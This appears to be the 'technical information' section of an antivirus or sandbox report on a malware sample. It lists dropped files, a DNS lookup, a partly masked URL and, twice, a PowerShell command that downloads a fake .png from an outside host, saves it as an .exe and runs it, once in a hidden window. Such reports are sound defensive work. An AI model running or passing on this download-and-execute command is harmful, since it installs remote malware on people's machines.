Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.bm##y.xyz/pure/zomdoz.png','%TEMP%\zomdoz.exe');%TEMP%\zomdoz.exe
- %TEMP%\trbatehtqevyaw.sct
- %TEMP%\1.exe
- http://www.bm##y.xyz/pure/zomdoz.png
- DNS ASK bm##y.xyz
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.bm##y.xyz/pure/zomdoz.png','%TEMP%\zomdoz.exe');%TEMP%\zomdoz.exe' (со скрытым окном)